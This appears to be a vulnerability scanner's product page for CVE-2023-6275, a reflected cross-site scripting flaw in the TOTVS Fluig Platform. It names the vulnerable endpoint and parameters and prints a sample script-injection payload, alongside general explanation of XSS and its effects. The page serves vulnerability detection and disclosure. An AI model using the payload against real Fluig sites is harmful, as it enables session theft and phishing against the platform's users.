S4E

CVE-2023-6275 Scanner

CVE-2023-6275 Scanner - Cross-Site Scripting (XSS) vulnerability in TOTVS Fluig Platform

Short Info


Level

Medium

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

10 seconds

Time Interval

26 days 6 hours

Scan only one

URL

Toolbox

-

The TOTVS Fluig Platform is a collaborative web-based application used by organizations for process management and document sharing. This platform provides tools to improve efficiency, communication, and productivity in the workplace. It is utilized by companies to facilitate the management of business processes and workforce across different sectors. The platform can be accessed through various internet-enabled devices, making it convenient for remote collaboration. Enterprises use Fluig to manage operational workflows and integrate with existing systems to enhance productivity. It also offers features like analytics and customizable dashboards to meet business-specific needs.

Cross-Site Scripting (XSS) is a common web application vulnerability that allows attackers to inject malicious scripts into a webpage viewed by other users. This specific XSS vulnerability affects the TOTVS Fluig Platform, enabling an attacker to execute harmful scripts in the context of a user’s browser. Exploiting XSS vulnerabilities can lead to unauthorized actions, like stealing session tokens or personal data, and can perform actions as the compromised user. XSS exploits rely on the user's browser executing scripts injected by the attacker, typically without the user's knowledge. Due to its ease of exploitability and potential for severe consequences, it is considered a significant security risk. This type of vulnerability impacts application integrity and user trust when left unpatched.

The vulnerability lies within an unknown functionality of the file /mobileredir/openApp.jsp on the TOTVS Fluig Platform. An attacker can manipulate the ‘redirectUrl’ or ‘user’ parameters with crafted input, such as "><script>alert(document.domain)</script>, which leads to the execution of a JavaScript payload. This XSS vulnerability is a reflected type, where the malicious script is returned to the user's browser immediately. The script executes in the context of the user visiting the page, allowing the attacker to interact with session data or other sensitive information. The endpoint and parameters are improperly sanitized, allowing the injection to occur.

If exploited, this vulnerability could cause numerous potential effects. Attackers could harvest sensitive data from users, such as authentication tokens, personal information, or manipulate page content. Users might be redirected to phishing sites or experience defacement of webpages they visit. Additionally, it could potentially compromise login credentials if used with social engineering tactics. Organizations may face data leakage and privacy violations, affecting business operations and reputation. Leaving such flaws unaddressed increases the risk of successful, malicious attacks on user accounts and sensitive information.

REFERENCES

Get started to protecting your Free Full Security Scan